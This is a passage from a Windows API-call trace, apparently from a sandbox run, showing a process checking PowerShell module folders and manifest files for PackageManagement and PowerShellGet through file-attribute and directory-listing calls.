Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0149.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0149.718] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0149.718] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0149.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0149.718] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2945b80 | out: lpFileInformation=0x2945b80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0149.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0149.718] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0149.718] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0149.718] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0149.718] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0149.719] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0149.719] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0149.722] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\keecfmwgj\\documents\\windowspowershell\\modules")) returned 0xffffffff [0149.732] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0149.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.734] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0149.734] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x30 [0149.734] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.734] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.734] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0149.734] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0149.735] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.735] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.735] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0149.735] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0149.735] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0149.736] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0149.736] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0149.736] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0149.736] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0149.736] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0149.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.736] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.737] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0149.737] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0149.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.737] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.737] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0149.737] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0149.738] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.738] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.738] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49a61de0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49a61de0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0149.738] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.738] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0149.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0149.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d4) returned 1 [0149.739] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e598 | out: lpFileInformation=0x5a0e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3bc80, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0149.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2d0) returned 1 [0149.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0149.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0149.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0149.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0149.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0149.740] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x294f964 | out: lpFileInformation=0x294f964*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3bc80, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0149.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0149.740] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0149.740] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0149.740] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0149.740] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0149.740] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0149.741] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0149.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.741] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0149.741] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0149.741] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.742] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.742] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0149.742] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.742] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.742] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0149.742] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0149.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d4) returned 1 [0149.742] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e598 | out: lpFileInformation=0x5a0e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0149.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2d0) returned 1 [0149.743] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0149.743] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0149.743] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0149.743] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0149.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0149.743] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2951034 | out: lpFileInformation=0x2951034*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0149.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0149.743] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0149.743] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files 